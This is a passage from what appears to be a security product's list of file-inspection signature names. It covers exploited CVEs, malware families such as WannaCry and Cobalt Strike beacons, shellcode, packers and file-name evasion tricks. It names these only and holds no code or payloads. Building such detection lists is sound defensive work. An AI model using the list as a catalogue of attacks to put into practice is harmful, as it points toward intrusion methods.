File-Binary_Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061
File-Binary_Windows-Media-HTTP-Stream
File-Binary_Windows-Media-Player-ASF-CVE-2009-2527
File-Binary_Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
File-Binary_Windows-Media-Player-DVR-MS-Memory-Corruption
File-Binary_Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
File-Binary_Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
File-Binary_Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
File-Binary_Windows-Memory-Disclosure-CVE-2017-0038
File-Binary_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
File-Binary_Windows-OpenType-CVE-2013-3128
File-Binary_Windows-Shell-Shortcut-Arbitrary-Code-Execution
File-Binary_Windows-Task-Scheduler-Job-File-System-Compromise
File-Binary_Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413
File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-29324
File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-35384
File-Binary_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
File-Binary_WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow
File-Binary_Word-Perfect-Document
File-Binary_x86-X41nop-Shellcode
File-Binary_x86-X90nop-Shellcode
File-Binary_XAR-Archive
File-Binary_XMRig_CPU_Miner_Binary_File
File-Binary_Xnview-PCT-File-Processing-Buffer-Overflow
File-Binary_Ysoserial-Generated-DotNet-Serialized-Object
File-Binary_Zlib-Denial-Of-Service-CVE-2004-0797
File-Binary_Zlib-Library-inflateGetHeader-Handling-Buffer-Overflow
File-Binary_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-Binary_Zoho-Manageengine-Opmanager-Datamigrationservlet-Insecure-Deserialization
File-Binary_Zoho-Manageengine-Opmanager-Getobjectdata-Insecure-Deserialization
File-Binary_Zoho-Manageengine-Opmanager-SumPDU-Java-Deserialization
File-Dropper
File-Exe_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Exe_Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow
File-Exe_Clamav-libclamav-PE-File-Handling-Integer-Overflow
File-Exe_Clamav-UPX-File-Handling-Buffer-Overflow
File-Exe_Clamav-UPX-File-Handling-Heap-Overflow
File-Exe_Clamav-UPX-File-Handling-Integer-Overflow
File-Exe_Clamav-UPX-File-PE-Parsing-Memory-Access-Error
File-Exe_Cobalt-Strike-Beacon-File
File-Exe_Conflicting-Content-Type-Flash
File-Exe_Conflicting-Content-Type-HTA
File-Exe_Conflicting-Content-Type-Text
File-Exe_Conflicting-Content-Type-Text-HTML
File-Exe_Conflicting-Content-Type-Text-Plain
File-Exe_EICAR-AntiVirus-Test
File-Exe_EQGRP-EternalBlue-2.2.0.exe
File-Exe_EQGRP-Eternalchampion
File-Exe_EQGRP-Eternalromance
File-Exe_EQGRP-Eternalsynergy
File-Exe_EQGRP-teflondoor.exe
File-Exe_EQGRP-teflonhandle.exe
File-Exe_Executable-File-Download
File-Exe_Executable-File-Transfer
File-Exe_Executable-File-Upload
File-Exe_Executable-From-A-Suspicious-Site
File-Exe_Executable-In-Archive
File-Exe_Executable-Matching-Exploit-CVE-2021-1647-1
File-Exe_Executable-Matching-Exploit-CVE-2021-1647-2
File-Exe_Executable_Disguised_As_Image_File
File-Exe_FireEye-Red-Team-Tools-TypelibGUID
File-Exe_HIDDEN-COBRA-Executable-COPPERHEDGE
File-Exe_HIDDEN-COBRA-Executable-PEBBLEDASH
File-Exe_HIDDEN-COBRA-Executable-TAINTEDSCRIBE
File-Exe_HTML-Identification-Evasion
File-Exe_KillDisk-Malware-Binary-File
File-Exe_Linear-Executable-LE
File-Exe_Linear-Executable-LX
File-Exe_Microjoin.gen_C-Download
File-Exe_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
File-Exe_Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow
File-Exe_Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
File-Exe_Microsoft-.NET-Framework-Winforms-Buffer-Overflow
File-Exe_Microsoft-.NET-Framework-Winforms-Information-Disclosure
File-Exe_Microsoft-.NET-Framework-Xaml-Browser-Applications-Stack-Corruption
File-Exe_Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566
File-Exe_Microsoft-Graphics-Component-CVE-2016-3348
File-Exe_Microsoft-Outlook-Object-Security-Bypass-Vulnerability
File-Exe_Microsoft-Silverlight-Vulnerability-CVE-2016-0034
File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability
File-Exe_Microsoft-Windows-ATMFD.DLL.Kernel-Code-Execution-Vulnerability-2
File-Exe_Microsoft-Windows-Font-Library-File-Buffer-Overflow
File-Exe_Microsoft-Windows-OTF-Fonts-Kernel-Vulnerability-CVE-2015-2426
File-Exe_Microsoft-Windows-PE-File-DVRT-Parsing-Denial-Of-Service
File-Exe_Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability
File-Exe_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
File-Exe_Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass
File-Exe_Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151
File-Exe_Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601
File-Exe_MS-DOS-Executable
File-Exe_New-Executable
File-Exe_Obfuscated-Shellcode-1
File-Exe_PEDICOM-Polyglot-File
File-Exe_Portable-Executable
File-Exe_Portable-Executable-32-Bit
File-Exe_Portable-Executable-64-Bit
File-Exe_Portable-Executable-Dynamic-Link-Libary
File-Exe_Portable-Executable-Header-Overlap
File-Exe_Portable-Executable-msstyles-File-Transfer
File-Exe_Portable-Executable-Nonstandard-Optional-Header-Signature
File-Exe_Portable-Executable-Nonstandard-Optional-Header-Size
File-Exe_Portable-Executable-OCRA-Application
File-Exe_Portable-Executable-Unknown-Architecture
File-Exe_Portable-Executable-Windows-Console-Application
File-Exe_Portable-Executable-Windows-GUI-Application
File-Exe_Portable-Executable-Windows-Native-Subsystem
File-Exe_Portable-Executable-Windows-OS2-Subsystem
File-Exe_Portable-Executable-Windows-POSIX-Subsystem
File-Exe_Portable-Executable-Windows-Unknown-Subsystem
File-Exe_Portable-Executable-x86
File-Exe_Portable-Executable-x86-64
File-Exe_Possible-Shamoon-DistTrack-Executable-Download
File-Exe_Self-Extracting-LhArc-Archive
File-Exe_Self-Extracting-Zip-Archive
File-Exe_SmartScreen-Security-warning-Bypass-For-PE-Files-CVE-2023-24880
File-Exe_Sophosencrypt-Ransomware
File-Exe_StalinLocker-Wiper-Binary-File
File-Exe_SunBurst-SUNBURST-Detected-1
File-Exe_SunBurst-SUNBURST-Detected-2
File-Exe_SunBurst-SUNBURST-Detected-3
File-Exe_SunBurst-SUPERNOVA-Detected-1
File-Exe_SunBurst-SUPERNOVA-Detected-2
File-Exe_SunBurst-TEARDROP-Detected-1
File-Exe_Suspected-Malicious-DLL-File
File-Exe_Suspicious-ELF-File-Download
File-Exe_Suspicious-Executable-Download
File-Exe_Suspicious-File
File-Exe_Symantec-AntiVirus-Engine-Decomposer-Mspack-Denial-Of-Service
File-Exe_Symantec-AntiVirus-Engine-PE-Header-Heap-Buffer-Overflow
File-Exe_Themida-Packed-Executable
File-Exe_Themida-Packed-Executable-2
File-Exe_UPX-Packed-Executable
File-Exe_Veil-Evading-Binary-1
File-Exe_Veil-Evading-Binary-2
File-Exe_Veil-Evading-Binary-3
File-Exe_Veil-Evading-Binary-4
File-Exe_Wannacry-Ransomware
File-Exe_Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453
File-Exe_Windows-Local-Privilege-Escalation-CVE-2016-0167
File-Exe_Windows-Remote-Desktop-Protocol-Client-Information-Disclosure-Vulnerability-CVE-2019-1108
File-Exe_Writeablebitmap-Setsource-Information-Disclosure
File-Exe_XMRig_CPU_Miner_Binary_File
File-Filtering-Policy_Buffering-Limit-Exceeded
File-Filtering-Policy_Buffering-Out-Of-Memory
File-Filtering-Policy_Not-Enough-Free-Disk-Space
File-Flash_Adobe-authplay.dll-CVE-2010-1297-Exploit-2
File-Flash_Adobe-Flash-Asnative-Null-Pointer-Dereference
File-Flash_Adobe-Flash-Bitmapdata-copyPixels-UAF
File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633
File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634
File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0638
File-Flash_Adobe-Flash-copyPixels-Integer-Overflow
File-Flash_Adobe-Flash-Corrupted-SWF-File
File-Flash_Adobe-Flash-CVE-2013-0634
File-Flash_Adobe-Flash-CVE-2013-5331
File-Flash_Adobe-Flash-Exploit-CVE-2010-3643
File-Flash_Adobe-Flash-Exploit-CVE-2011-0609
File-Flash_Adobe-Flash-Exploit-CVE-2011-0609-2
File-Flash_Adobe-Flash-Exploit-CVE-2011-0611
File-Flash_Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion
File-Flash_Adobe-Flash-Iexternalizable-Interface-Type-Confusion
File-Flash_Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow
File-Flash_Adobe-Flash-Loadpcmfrombytearray-Use-After-Free
File-Flash_Adobe-Flash-Media-Transfer
File-Flash_Adobe-Flash-Memory-Corruption-CVE-2012-5267
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155
File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156
File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities
File-Flash_Adobe-Flash-parseFloat-Stack-Buffer-Overflow
File-Flash_Adobe-Flash-PCRE-Memory-Corruption
File-Flash_Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow
File-Flash_Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities
File-Flash_Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow
File-Flash_Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion
File-Flash_Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113
File-Flash_Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access
File-Flash_Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference
File-Flash_Adobe-Flash-Player-ByteArray-Use-After-Free-RCS
File-Flash_Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free
File-Flash_Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow
File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing
File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing-2
File-Flash_Adobe-Flash-Player-CVE-2014-8439-Write-What-Where
File-Flash_Adobe-Flash-Player-CVE-2015-3106-Use-After-Free
File-Flash_Adobe-Flash-Player-CVE-2015-5561-Use-After-Free
File-Flash_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
File-Flash_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
File-Flash_Adobe-Flash-Player-Domainmemory-Clear-Use-After-Free
File-Flash_Adobe-Flash-Player-Domainmemory-Use-After-Free
File-Flash_Adobe-Flash-Player-Domainmemory-Write-Use-After-Free
File-Flash_Adobe-Flash-Player-Filereference-Type-Confusion
File-Flash_Adobe-Flash-Player-FLV-Processing-Buffer-Overflow
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-2
File-Flash_Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution-3
File-Flash_Adobe-Flash-Player-Function-Variables-Information-Disclosure
File-Flash_Adobe-Flash-Player-Index-Overflow-Vulnerability
File-Flash_Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
File-Flash_Adobe-Flash-Player-Load-And-Store-Write-What-Where
File-Flash_Adobe-Flash-Player-Loadpcmfrombytearray-Integer-Overflow
File-Flash_Adobe-Flash-Player-Localeid-Determinepreferredlocales-Out-of-Bounds-Access
File-Flash_Adobe-Flash-Player-Nellymoser-Datasize-Heap-Buffer-Overflow
File-Flash_Adobe-Flash-Player-OP_inclocal-And-OP_declocal-Memory-Corruption
File-Flash_Adobe-Flash-Player-Rectangle-Use-After-Free
File-Flash_Adobe-Flash-Player-Shader-Memory-Corruption
File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where
File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-2
File-Flash_Adobe-Flash-Player-Shader-Parameter-Write-What-Where-3
File-Flash_Adobe-Flash-Player-ShaderJob-Memory-Corruption
File-Flash_Adobe-Flash-Player-Sharedobject-Use-After-Free
File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution
File-Flash_Adobe-Flash-Player-SWF-File-Code-Execution-2
File-Flash_Adobe-Flash-Player-TextLine-opaqueBackground-Use-After-Free
File-Flash_Adobe-Flash-Player-Type-Confusion-Memory-Corruption
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-5122
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8413
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8430
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-0988
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-7892
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3058
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3059
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3062
File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3063
File-Flash_Adobe-Flash-Player-Vulnerability-CVE-2012-1535
File-Flash_Adobe-Flash-Selection.setfocus-Use-After-Free
File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144
File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149
File-Flash_Adobe-Flash-Use-After-Free-CVE-2016-7855
File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121
File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142
File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143
File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146
File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147
File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148
File-Flash_Adobe-Flash-Vulnerability-CVE-2016-4171
File-Flash_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Flash_Conflicting-Content-Type-Text
File-Flash_Conflicting-Content-Type-Text-HTML
File-Flash_Conflicting-Content-Type-Text-Plain
File-Flash_DoSWF-Obfuscation
File-Flash_EICAR-AntiVirus-Test
File-Flash_Flash-File-In-Non-Standard-Port
File-Flash_Flash-From-A-Suspicious-Site
File-Flash_Generic-Shellcode-3
File-Flash_Invalid-Bytecode-CVE-2017-11292
File-Flash_Magnitude-Exploit-Stager
File-Flash_Microsoft-Internet-Explorer-CVE-2016-3327
File-Flash_RealNetworks-RealPlayer-FLV-Parsing-Integer-Overflow
File-Flash_RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow
File-Flash_RIG-EK-Exploit
File-Flash_SecureSWF-Obfuscation
File-Flash_Shared-Variables
File-Flash_Suspicious-Content-From-IP-Address-Host
File-Flash_Suspicious-Content-From-Random-Host
File-Flash_Suspicious-Email-Content-From-Random-Host
File-Flash_Suspicious-Flash-File
File-Flash_Video-Content-From-IP-Address-Host
File-GIF_Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption
File-GIF_Adobe-Reader-Memory-Corruption-CVE-2017-3050
File-GIF_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-GIF_Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow
File-GIF_Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow
File-GIF_Conflicting-Content-Type-Text
File-GIF_Conflicting-Content-Type-Text-HTML
File-GIF_Conflicting-Content-Type-Text-Plain
File-GIF_Contaware-Freevimager-GIF-Lzwminimumcodesize-Memory-Corruption
File-GIF_EICAR-AntiVirus-Test
File-GIF_Embedded-Zip-Archive
File-GIF_IBM-Domino-Gif-Processing-Heap-Buffer-Overflow
File-GIF_Ie-Cross-Domain-Frame-Spoof
File-GIF_Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow
File-GIF_Internet-Explorer-Malformed-Gif-File-Double-Free
File-GIF_Microsoft-Windows-Graphics-Rendering-Engine-Gif-Parsing-Buffer-Overflow
File-GIF_Mozilla-Firefox-Gif-Netscape-Extension-Buffer-Overflow
File-GIF_Mozilla-Products-Malformed-Gif-Buffer-Overflow
File-GIF_MS-DirectShow-CVE-2013-3174
File-GIF_Opera-Software-Opera-GIF-Processing-Memory-Corruption
File-GIF_PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read
File-GIF_Skyflas.A-Traffic
File-GIF_Sun-Java-Web-Start-Splashscreen-Gif-Decoding-Buffer-Overflow
File-GIF_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
File-GIF_Suspicious-File
File-GIF_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow
File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read
File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read
File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2960
File-JPEG_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2964
File-JPEG_Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow
File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read
File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889
File-JPEG_Adobe-Acrobat-XPS-Out-Of-Bounds-Read
File-JPEG_Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176
File-JPEG_Apple-QuickTime-JPEG-2000-Cod-Length-Integer-Underflow
File-JPEG_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
File-JPEG_Conflicting-Content-Type-Text
File-JPEG_Conflicting-Content-Type-Text-HTML
File-JPEG_Conflicting-Content-Type-Text-Plain
File-JPEG_EICAR-AntiVirus-Test
File-JPEG_Embedded-Zip-Archive
File-JPEG_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
File-JPEG_HTML-After-JPEG-File-In-Same-Response
File-JPEG_HTML-Inside-JPEG-File
File-JPEG_Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
File-JPEG_Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing
File-JPEG_Internet-Explorer-JPEG-Rendering-Memory-Corruption
File-JPEG_Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow
File-JPEG_Jasper-Jp2_Decode-Out-Of-Bounds-Read
File-JPEG_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
File-JPEG_Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355
File-JPEG_Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
File-JPEG_Microsoft-Windows-Codecs-Library-Information-Disclosure
File-JPEG_Microsoft-Windows-DirectShow-JPEG-Double-Free
File-JPEG_Microsoft-Windows-Image-ICC-Profile-Code-Execution
File-JPEG_Microsoft-Windows-Suspicious-ICC-Profile-In-JPEG-File
File-JPEG_OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write
File-JPEG_Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow
File-JPEG_Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-BOF
File-JPEG_Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference
File-JPEG_PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference
File-JPEG_Script-After-JPEG-File-In-Same-Response
File-JPEG_Script-Inside-JPEG-File
File-JPEG_Shared-Variables
File-JPEG_Sun-JDK-Image-Parsing-Library-ICC-Buffer-Overflow
File-JPEG_Suspicious-File
File-JPEG_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
File-Member-Name_Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
File-Member-Name_Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload
File-Member-Name_Apache-Pulsar-Unpack-Directory-Traversal
File-Member-Name_Apache-Solr-Configset-Upload-Directory-Traversal
File-Member-Name_Apache-Solr-Configsets-Arbitrary-File-Upload-CVE-2023-50386
File-Member-Name_ATutor-Directory-Traversal-RCE
File-Member-Name_Directory-Traversal-In-File-Name
File-Member-Name_HP-Intelligent-Management-Center-Mibfileupload-Servlet-Vulnerability
File-Member-Name_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
File-Member-Name_RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability
File-Member-Name_Shared-Variables
File-Member-Name_Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal
File-Member-Name_SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal
File-Member-Name_VBScript-File-Transfer
File-Member-Name_Windows-Script-File-Transfer
File-Member-Name_Zimbra-Collaboration-Mboximport-Directory-Traversal-CVE-2022-27925
File-MPEG_3ivx-MPEG-4-MP4-File-Handling-Stack-Overflow
File-MPEG_Adobe-Flash-Player-MP4-File-Memory-Corruption
File-MPEG_Adobe-Flash-Player-MP4-Sequence-Parameter-Set-Parsing-BOF
File-MPEG_Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
File-MPEG_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-MPEG_Apple-QTVR-Sample-Atoms-Movie-File-Handling-Buffer-Overflow
File-MPEG_Apple-QuickTime-Alis-Volume-Name-Parsing-Stack-Buffer-Overflow
File-MPEG_Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
File-MPEG_Apple-QuickTime-Color-Table-Id-Heap-Corruption
File-MPEG_Apple-QuickTime-Crgn-Atom-Parsing-Memory-Corruption
File-MPEG_Apple-QuickTime-Enof-Atom-Parsing-Heap-Buffer-Overflow
File-MPEG_Apple-QuickTime-FlipFileTypeAtomBton-Integer-Underflow
File-MPEG_Apple-QuickTime-Ftab-Atom-Stack-Buffer-Overflow
File-MPEG_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
File-MPEG_Apple-QuickTime-Image-Description-Atom-Sign-Extension
File-MPEG_Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
File-MPEG_Apple-QuickTime-Media
File-MPEG_Apple-QuickTime-Mjpeg-Frame-Stsd-Atom-Heap-Overflow
File-MPEG_Apple-QuickTime-Mov-File-JVTCompEncodeFrame-Heap-Overflow
File-MPEG_Apple-QuickTime-Mov-File-String-Handling-Integer-Overflow
File-MPEG_Apple-QuickTime-Movie-File-Clipping-Region-Handling-Heap-Buffer-Overflow
File-MPEG_Apple-QuickTime-Movie-With-Embedded-Script
File-MPEG_Apple-QuickTime-MP4-Absent-Stbl-Box-Memory-Corruption
File-MPEG_Apple-QuickTime-MPEG-Stream-Padding-Buffer-Overflow
File-MPEG_Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
File-MPEG_Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow
File-MPEG_Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow
File-MPEG_Apple-QuickTime-Stsc-Heap-Overflow
File-MPEG_Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow
File-MPEG_Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access
File-MPEG_Apple-QuickTime-Udta-Atom-Buffer-Overflow
File-MPEG_Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
File-MPEG_Apple-QuickTime-Vr-Tkhd-Atom-Heap-Corruption
File-MPEG_Conflicting-Content-Type-Text
File-MPEG_Conflicting-Content-Type-Text-HTML
File-MPEG_Conflicting-Content-Type-Text-Plain
File-MPEG_EICAR-AntiVirus-Test
File-MPEG_Embedded-Zip-Archive
File-MPEG_FFmpeg-Mov_Read_Keys-Integer-Overflow
File-MPEG_Gstreamer-QuickTime-File-Parsing-Multiple-Heap-Overflows
File-MPEG_ISO-MPEG-4-Download
File-MPEG_Libextractor-Qt-Heap-Buffer-Overflow
File-MPEG_Microsoft-DirectShow-QuickTime-Atom-Size-Memory-Corruption
File-MPEG_Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
File-MPEG_Microsoft-DirectShow-QuickTime-Stsc-Atom-Parsing-Memory-Corruption
File-MPEG_Microsoft-DirectShow-Remote-Code-Execution
File-MPEG_Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free
File-MPEG_Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read
File-MPEG_Microsoft-Windows-Media-Foundation-Memory-Corruption-CVE-2020-16915
File-MPEG_MPlayer-For-Windows-Calloc-Integer-Overflow
File-MPEG_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
File-MPEG_Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection
File-MPEG_RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption
File-MPEG_Suspicious-File
File-MPEG_VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
File-MPEG_Windows-Media-Decompression-Vulnerability-CVE-2013-0077
File-Name_File-Name-Beginning-With-Possible-Command-Injection-Characters
File-Name_Known-Phishing-Word-Documents
File-Name_Microsoft-Office-Security-Feature-Bypass-CVE-2023-36413
File-Name_OpenSSL-C-rehash-Script-Command-Injection-Vulnerability
File-Name_OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability
File-Name_Potentially-Suspicious-Double-Extension-In-File-Name
File-Name_Potentially-Suspicious-Non-Printables-In-File-Name
File-Name_RDP-Session-Configuration-File
File-Name_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
File-Name_Search-Connector-Description-File-Transfer
File-Name_Shared-Variables
File-Name_Shell-Library-Description-File-Transfer
File-Name_Suspicious-Double-Extension-In-File-Name
File-Name_Suspicious-Executable-Filename
File-Name_Suspicious-Non-Printables-In-File-Name
File-Name_VBScript-File-Transfer
File-Name_Windows-Script-File-Transfer
File-OLE_Adobe-Flash-Embedded-In-OLE-Document
File-OLE_Adobe-Flash-Exploit-CVE-2011-0609
File-OLE_Adobe-Flash-Exploit-CVE-2011-0609-2
File-OLE_Adobe-Flash-Exploit-CVE-2011-0611
File-OLE_Adobe-Flash-Player-CVE-2018-15982-Use-After-Free
File-OLE_Adobe-Flash-Player-CVE-2018-4878-Use-After-Free
File-OLE_Adobe-Flash-Player-Vulnerability-CVE-2012-1535
File-OLE_Adobe-Photoshop-7-Image
File-OLE_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow
File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption
File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow
File-OLE_Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
File-OLE_Apple-QuickTime-FPX-File-Handling-Integer-Overflow
File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1767-Memory-Corruption
File-OLE_Apple-QuickTime-FPX-File-Parsing-CVE-2016-1768-Memory-Corruption
File-OLE_Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
File-OLE_Barracuda-ESG-Parameter-Injection-CVE-2023-7102
File-OLE_Business-Objects-Crystal-Reports-Rpt-File-Handling
File-OLE_Clamav-Initialize_Encryption_Key_-Out-Of-Bounds-Read
File-OLE_Clamav-Ole2-Uniq_Add-Out-of-Bounds-Write
File-OLE_Conflicting-Content-Type-Text
File-OLE_Conflicting-Content-Type-Text-HTML
File-OLE_Conflicting-Content-Type-Text-Plain
File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-CFB-Header-Parsing-Memory-Corruption
File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Index-Record-Parsing-Buffer-Overflow
File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Labelsst-Memory-Corruption
File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Mulblank-Record-Parsing-Heap-Buffer-Overflow
